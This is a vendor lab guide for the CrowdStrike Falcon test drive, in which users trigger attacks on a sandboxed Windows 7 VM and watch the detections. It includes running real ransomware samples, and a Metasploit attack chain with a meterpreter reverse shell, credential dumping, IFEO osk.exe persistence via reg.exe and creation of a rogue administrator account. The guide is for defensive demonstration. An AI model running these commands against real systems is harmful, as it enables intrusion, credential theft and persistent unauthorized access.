04/30/2018

Table of Contents
INTRODUCTION 2

ENVIRONMENT OVERVIEW 3
CLOUDSHARE TIPS: 3
USING THE FALCON UI: 5

TESTING SCENARIOS 6
SCENARIO 1: SENSOR INSTALL 6
SCENARIO 2: RANSOMWARE 8
SCENARIO 3: PHISHING EMAIL AND BROWSER BASED EXPLOIT 12
SCENARIO 4: INVESTIGATE 24
SCENARIO 5: EVENTS APP 26

CONCLUSION 27

INTRODUCTION

Welcome to the CrowdStrike Falcon Test Drive. This document will walk you through our virtual test
environment which allows you to get some initial hands on experience with CrowdStrike Falcon. This virtual
environment is a shared instance in the CrowdStrike Platform and comes with a few restrictions. For example,
you will have read only access to the UI and cannot change settings to prevent interference with other test
drivers. We encourage you to go through this document and then reach out to your CrowdStrike contact and
request a full POV (Proof of Value), which would give you your own dedicated instance of CrowdStrike Falcon,
the ability to install sensors in your own environment, make policy changes and also a technical resource at
CrowdStrike to help with deep dive demonstrations.

We hope you enjoy this test drive and thank you for considering CrowdStrike Falcon.

1
ENVIRONMENT OVERVIEW

By now, a CloudShare environment has already been provisioned for you (if for some reason you are reading
this and you do not have a Test Drive account for CloudShare yet, please go ahead and ​contact us​)
Within this environment, you will have access to the Virtual Machines listed below. You will be installing the
CrowdStrike Falcon sensor on the Victim VM within CloudShare only.

Name: OS: IP Address:

Attacker VM (Metasploit) Ubuntu 12.04.3 Desktop 10.160.128.168
Victim VM Windows 7 x64 10.160.179.148

To access the environment, please visit ​https://use.cloudshare.com/Login.aspx​ and login using the credentials
you configured when first accessing the environment.

CloudShare Tips:

1. Once logged in to your CloudShare account, you will be presented with the following page. Click on the
“Start Using This Environment” link to get started. In cases where your environment is suspended after
being idle for an hour, the resume process may take 3-5 minutes.

2. You will now see a list of your VMs

2
 3. To access the VMs, click on the “​View VM​” button and open the virtual machines. You can switch
between the “​Victim VM​” and “​Attacker VM​” via the tabs at the top.

4. Additional details, such as the credentials for each of the machines, can be found on the left hand side
menu.

5. To copy/paste text into the VM, use the “VM Clipboard” option

6. NOTE: Your CloudShare instance will be assigned a random hostname. You need to write down that
hostname and use it when accessing the Falcon UI to filter results for just your machine.
 
● Windows 7 Victim VM ​→​ ​hostname​ ​→​ ​CS-XXXXXX-XXXX 

3
Using the Falcon UI:

The console for CrowdStrike Falcon is 100% managed in the cloud which means no management
servers for you to configure, upgrade, backup, or patch. Login to the console can be achieved from any
browser by going to ​https://falcon.crowdstrike.com​. We recommend that you use Google Chrome as
your browser for the best user experience.

Credentials for the Falcon UI have been provided to you in a separate email and are different from
your CloudShare credentials.

4
TESTING SCENARIOS

The following scenarios can be used to extensively assess CrowdStrike Falcon’s capabilities to detect and
prevent advanced attacks. These scenarios directly mimic real life techniques used by adversaries every day.  

Scenario 1: Sensor Install

Summary
This first Scenario is only going to install the CrowdStrike Falcon Sensor on your Victim VM machine
and verify that the sensor has registered with the CrowdStrike Platform. You will see how quick and
easy it is to deploy CrowdStrike Falcon and get a machine protected.

Step by Step

1. Open the ​Victim VM​. On the Desktop, locate the “​WindowsSensor​” installer and double click it.

2. Follow the on screen prompts to finish the installation. Note that no reboot is required after installing
CrowdStrike Falcon and that you will not see anything in the system tray of the VM.

5
3. In the upper right hand corner of your Desktop you should see the hostname of the machine (in our
example it was CS-161216-1221). Please write your hostname down as you will need it several times
when going through the Scenarios. It is recommended to have the hostname in a text editor to be able
to copy and paste it easily.

4. Switch to the ​Falcon UI​ tab and navigate to the “​Hosts app​” on the left hand side. Paste your hostname
into the filter field on top and see if your machine appears. If your machine does not appear right
away, please refresh in 1 minute.

5. Congratulations, you have completed your CrowdStrike Falcon install and are now ready to proceed to
attack your machine.

6
Scenario 2: Ransomware

Summary
In this Scenario we will run through how CrowdStrike Falcon Machine Learning protects you from
ransomware, how the Falcon UI displays detections and how behavioral protections can help with
unknown malware.

Step by Step
1. On the Desktop of your ​Victim VM ​you can find a folder called​ malware​. Inside are individual pieces of
malware, for example the Locky and WannaCry ransomware. These are real, unmodified pieces of
malware that should not be used outside of this Test Drive environment!

You can use any of the malware files in the folder. For simplicity we will use ​“locky.zip”​ in our guide.
The same instructions apply to the other samples.

Right click on ​“locky.zip”​, then select ​“7-Zip” >> “Extract to locky\”​. The password is ​infected​. After the
extraction has finished, open the ​“locky”​ folder and double click “​locky.exe​”. You will see that
CrowdStrike Falcon prevents the executable from running and quarantines the file.

2. Switch to the ​Falcon UI​ and if you are not already there open the “​Activity app​” on the left hand side.

7
3. Now please type ​Hostname:CS-161216-1221​ (replace CS-161216-1221 with your Victim VM hostname)
into the filter field on top of the detections and press enter. If no detection is showing up, please
refresh in 1 minute and verify the host name.

4. Click on the new alert from your host to see the process tree of this detection. Locky was detected by
the signature less machine learning engine of CrowdStrike Falcon. But when you click on “​locky.exe​”,
you can also see that there have been 52 AV Detections for this file.

5. We will now modify “​locky.exe​” so that the file hash changes and the file becomes unknown malware.
Switch back to your ​Victim VM​ and extract ​“locky.zip”​ again like you did in Step 1. Then right click on
“​locky.exe​” and select “​Open with HxD​”.

8
6. HxD is a HEX editor that allows us to modify the binary directly. On the right hand side, find the text
that reads “​… be run in DOS mode​” and modify a part of it with new text. For example, click inside the
word, “​DOS​” after the “D” and change it to “​DXS​”, by typing “X”.
Note: To preserve the integrity of the file, you need to make sure that you do not end up with less
or more characters than you started with. HxD by default is in “override mode”.

7. When you are done editing the file, please click on “​File >> Save as​” and then give it a new name like
“​locky_modified.exe​”. You need to type the extension “.exe” at the end.

9
 8. Now double click the ​“locky_modified.exe”​ and see that the file again gets blocked and quarantined. If
you switch back to your Falcon UI tab and go back to the detections screen (filtered for your
hostname), you will see a second detection now.

Expanding the detection, you can see the process tree for our modified sample and when clicking on
“​locky_modified.exe​” you can see 0 AV detections on this unknown sample.

Congratulations. In this Scenario we have shown how CrowdStrike Falcon prevents common malware and
even after modifying malware, just like the bad guys do, CrowdStrike Falcon still protected the system with its
Machine Learning engine.

10
Scenario 3: Phishing email and browser based exploit
 
Summary

This is one of the most common tactics used to compromise an end user’s system. An adversary will
often employ social engineering through spear phishing emails that directly target members of an
organization with custom messages that increase the likelihood of the user clicking on a link or opening
an attachment. Once they have gained access to one user’s system they will exfiltrate any relevant
data and attempt to move laterally to other systems on the network.

Step by Step
 
1. Open the ​Attacker VM​ and see if metasploit is already started. If it is not, please open a terminal and
type ​“msfconsole”​ to start metasploit

2. On the Desktop is a text file called ​“metasploit-commands.txt”.​ If it is not yet open, please open it
now.
The metasploit console and the text file with the commands should be placed so you can see them
both at the same time.

11
 3. From the text file copy the first 8 commands (up to the line that says ​“exploit”​) and paste them into
the metasploit terminal window. Then hit ​“enter”

Here are the details of the commands we are running:

a) Setup the payload by running the following command
use payload/windows/meterpreter/reverse_tcp. ​This is what will be run on the system after
the exploit has succeeded.
b) Run the command ​set LHOST​ ​10.160.128.168 ​to tell the meterpreter shell which IP address it
should connect back to. Where 10.160.128.168 is the IP address of the Attacker VM.
c) Run the command ​set AutoRunScript post/windows/manage/migrate​ to make sure the
meterpreter payload migrates to a clean process after exploitation
d) Run command ​use exploit/multi/browser/java_rhino​ this will setup a browser based exploit
specific to java.
e) Run command ​set SRVHOST 10.160.128.168
f) Run the command ​set SRVPORT 8080
g) Run command ​set URIPATH /​ so that the exploit is hosted at the root and no additional
information is required in the URI request
h) Run command ​exploit ​to set it all up and take note of the URL being used
 
  
   

12
 4. With the Attacker VM configured, access the ​Victim VM​. Open Outlook and review the “​Action
Required: Your Mailbox is Full​” message. Within this e-mail, a weaponized link is already provided.
Click on the link to start the exploit. Internet Explorer should open and only show a blank page.

 
5. Go back to the ​Attacker VM​ and you should now see the following output which indicates the exploit
was successful and the meterpreter payload has been migrated into the memory space of
notepad.exe. This deters any file based scanning and whitelisting tools as there are no file artifacts and
the malicious code is running from a valid application.

13
 6. In the ​Falcon UI​ a new detection event has been generated, click on the detection for more details.
CrowdStrike Falcon has identified the web exploit activity and also captured the relevant metadata
such as the exploit site domain and IP address. Additionally, the process tree identifies the parent
process as outlook.exe which clearly indicates the exploit occurred as the result of a phishing email.

Click on ​“Full detection details”​ to view the detection in a process tree.

 
 
 
7. Switch back to the ​Attacker VM​ and copy/paste the following commands from your
metasploit-commands.txt file:
a) sessions –l ​to get a list of active meterpreter sessions
b) sessions –i 1 ​(where 1 is the session Id you received as output).
 

14
  
8. You now have full access to the target system and can run built in meterpreter commands. In your text
file you will find the commands for our next steps (please copy/paste/run these one at a time):
a) upload lslsass64.exe C:\\temp credential theft tool used later in this scenario
b) shell get a windows command prompt
c) whoami Determine the user account context of your shell
d) taskkill /IM iexplore.exe /F Kill the internet explorer window to hide your tracks
e) netstat -ano Identify current network connections and potential targets
f) ipconfig Obtain network stack information

15
9. Switch back to the ​Falcon UI​ and refresh your web browser that is opened to the detection details
page. Click on the little plus symbol at the corner of “cmd.exe”. Notice the commands you just
executed have been captured in real-time and recorded within the process tree with corresponding
metadata.

10. One of the technologies powering CrowdStrike Falcon intelligence based attribution capabilities is our
own Threat Intelligence platform. For our test, we will be using only a simple intelligence indicator.
On the ​Attacker VM​, please copy and paste the command​ ping –n 1 systemlowcheck.com ​from your
metasploit-commands.txt. Then refresh your ​Falcon UI​ detection page and you will notice a new
detection pattern called “​Intel​”.

16
11. In the details view, we can see that this domain is associated with one of the adversaries we track and
that it was used in targeted attacks before. Please copy the domain name and then open the ​“Actors”
app in a new tab (right click). In the Actors app, please paste the domain name into the search bar to
see additional details on the adversary ​Fancy Bear​. Once you are done reviewing the additional details,
you may close the tab.

12. In the following example, we will be using a modified binary capable of dumping a user’s password
hash. You uploaded “lslsass64.exe” as one of the earlier steps in meterpreter. Now it is time to use it.
Switch back to the ​Attacker VM​ and copy/paste the following commands from your text file:
1. cd C:\temp
2. lslsass64.exe a

17
13. Refresh your browser with the detection page open, notice the updated “​Credential Theft​” detection
pattern showing up reflecting your recent lslsass64.exe tool run. Also, notice how lslsass64.exe shows
“0 AV Detections” since we are running a modified version. This detection was picked up as a result of
our Indicator of Attack (IOA) capable of detecting credential theft regardless of AV detections.

14. Now it is time to establish persistence. On the ​Attacker VM​, copy/paste the next command into your
shell. This will create a registry entry on the target system allowing a system level shell to be invoked
any time the osk.exe (on screen keyboard) process is called.
1. reg.exe add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File
Execution Options\osk.exe" /v "Debugger" /t REG_SZ /d "cmd.exe" /f.

18
15. This activity has triggered another detection with ​Suspicious Activity​. Refresh the detection UI to see
the updated information. The full command line input is captured as well as the metadata under
Persistence​ that identifies the specific registry key that has been updated.

16. Open a new terminal/shell on the ​Attacker VM​ (Right click on Terminal > New Terminal). Type the
command ​rdesktop 10.160.179.148​ ​to open a remote desktop session to the victim VM.

19
 17. In the remote Desktop window click the accessibility icon on the bottom left and check the On-Screen
Keyboard option. Click Apply and you’ll see a command prompt opens.
 
NOTE:​ The rdesktop window times out pretty quickly if no activity is detected. If your 
rdesktop window closes, just run the rdesktop command from step 16 again 
 

 
 
18. The shell has system level privileges (run the command ​whoami​ ​to confirm) and better yet did not
generate any Windows logon events. This technique is used by advanced adversaries as it goes
undetected by traditional security solutions.

20
 19. Switch back to your ​Falcon UI​. Go back to the detections screen (filtered for your hostname) and you
will find a new detection event has been generated. Navigate to the new detection details and you will
see a ​Critical​ event has been generated and identifies this as a ​Privilege Escalation​ attack.
 

20. Switch back to the ​Attacker VM​ where the Remote Desktop session is open (restart it if it timed out).
In the open command prompt, go ahead and create a new local administrator account:
a) net user webadmin testpass$1234 /add
b) net localgroup administrators webadmin /add

21
21. Navigate back to the ​Falcon UI​ and click on the “​Full Detection Details​” option in your detection. You
can now expand “​CMD.EXE​” to see that any commands typed above were added to the event.

22. After checking the events in the UI lets test the new user you created in the remote desktop session
(note if the session has timed out in the terminal just open a new one, the user account created will
still be there). Run ​rdesktop 10.160.179.148 ​and user username​ webadmin ​and password
testpass$1234 ​to login.

22
 23. Congratulations you have completed an entire advanced attack scenario including exploiting a
vulnerable machine, performing reconnaissance and establishing persistence. CrowdStrike Falcon gave
you full visibility into each step of the attack. For this scenario, the CrowdStrike Falcon preventions
were disabled, so the attack could succeed and you could experience every step of this breach. The
detections​ you have seen can easily be turned into ​preventions.

For a complete demonstration of prevention capabilities, please reach out to your CrowdStrike
representative and request a POV.
 
Scenario 4: Investigate

Using the machine name of the ​Victim VM​ we will go through a quick scenario to illustrate how the investigate
app works and all the information available in the Falcon UI. In this scenario we will:

● Investigate activity associate with a single machine using the machine name to search for events.
● Run a file with a specific hash to illustrate how the investigate app can search for a single hash.
This step can be done for a single hash or in bulk for IOC hunting scenarios

1. To start open the ​Victim VM​ and locate the host name in the upper right hand corner.

2. Navigate back to the ​Falcon UI​ and find the “​Investigate​” app on the left hand side. The default search
page will be “Computer”. In the “Host Name” field type in the name of your host from the previous
step. The investigate app can filter on time frame to give you things like detection history, unresolved
detections, process executions, network connections and others associated with your host.

23
3. Go back to the ​Victim VM​ and find a folder on the desktop named “​this_does_nothing_v1​”

4. Open the folder and run the file. Doing so will open a command prompt and print a hash to the screen.
The hash of the file is ​4e106c973f28acfc4461caec3179319e784afa9cd939e3eda41ee7426e60989f

24
 5. Back in the ​Falcon UI​ in the investigate app navigate to the “​Hash Search​” option and paste in the hash
“​4e106c973f28acfc4461caec3179319e784afa9cd939e3eda41ee7426e60989f​”. Change the “​Time
Range​” to include more than a month and hit “Submit”.
The Results will not only show your machine, but any other machine in the environment with this IOC
hash

6. Congratulations, you just experienced the detailed visibility the CrowdStrike Falcon platform can give
you not only for individual hosts, but for your entire network.

Scenario 5: Events Search

The Events app can be used for very granular hunting. It is a front end that uses the “Splunk” syntax.
In this scenario we will show you a single example of the type of visibility you can get. There are hundreds of
other searches that can be performed with the Events app. Please reach out to us to get a full demo of the
capabilities of this CrowdStrike Falcon feature.

1. On the ​Victim VM​ open PowerShell, a shortcut is provided in the menu bar, and type in the two
commands:
a) whoami
b) netstat
c) exit

25
 2. Now navigate back to the ​Falcon UI​ and find the “​Investigate​” app on the left hand side. Select “​Event
Search​” from the options.
In the search field type
ComputerName=CS-161014-1049 ApplicationName=powershell.exe CommandHistory
NOTE: The computer name should be the name of your victim machine that you typed the commands
on.

It can take up to 15 minutes for the full commands to be available in the Events Search. If your search
returns “No results found”, give it a little bit of time and try again.

CONCLUSION

This test drive is designed to give you some hands on experience with CrowdStrike Falcon and the
different prevention, detection and visibility features it offers. We sincerely hope you enjoyed the
experience and had some fun in the process. If you would like to talk more about CrowdStrike Falcon
or get a full demonstration, please contact your CrowdStrike representative.

26